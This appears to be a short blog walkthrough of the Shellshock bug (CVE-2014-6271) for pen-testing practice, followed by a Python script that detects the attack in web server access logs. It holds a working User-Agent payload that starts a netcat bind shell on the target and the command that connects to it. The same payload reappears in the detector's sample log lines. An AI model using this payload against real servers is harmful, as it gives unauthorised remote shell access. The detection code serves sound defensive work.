Sunday, December 23, 2018

CVE-2014-6271 walk through

When practicing pen testing against CVE-2014-6271:

In Burp Suite, intercept the request with the proxy, send it to Repeater, and modify the User-Agent header:


GET / HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh

Repeater will not return a response, because the netcat listener started on the target is now waiting for a connection.

Open another prompt and launch netcat to connect to port 9999:

nc xxx.xxx.xxx.xxx 9999

You are now at the /bin/sh prompt on the compromised system, so you can type a command like

"whoami"
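On the defending side, the request above leaves a recognizable trace in the web server's access log: a header value carrying the `() {` prefix. The following is an added example, not part of the original post, that scans combined-format access log lines for it; the log lines, addresses, path and the name `find_shellshock` are constructed for illustration.

```python
import re

# Four-character prefix that unpatched bash treats as a function definition
# when importing an environment variable (CVE-2014-6271). It is searched for
# anywhere in a field, which is broader than bash's own start-of-value check.
MARKER = "() {"

# Apache/nginx "combined" log format; quoted fields may contain \" escapes.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
COMBINED_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' \d{3} \S+ ' + QUOTED + ' ' + QUOTED + '$'
)
FIELD_NAMES = ("request", "referer", "agent")


def find_shellshock(lines):
    """Return one finding per log line that carries the marker."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = COMBINED_RE.match(line.strip())
        if not m:
            # Lines that do not parse are still scanned whole, so nothing is skipped.
            if MARKER in line:
                findings.append({"line": lineno, "ip": None, "fields": ["raw"]})
            continue
        ip, *values = m.groups()
        fields = [n for n, v in zip(FIELD_NAMES, values) if MARKER in v]
        if fields:
            findings.append({"line": lineno, "ip": ip, "fields": fields})
    return findings


# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [23/Dec/2018:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [23/Dec/2018:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "() { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh"',
    '203.0.113.9 - - [23/Dec/2018:10:01:09 +0000] "GET /cgi-bin/status HTTP/1.1" 500 0 "() { :;}; echo test" "curl/7.61.0"',
]

if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(hit)
```

The third sample line shows why the check covers more than User-Agent: the web server passes other request headers to CGI programs as environment variables too.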
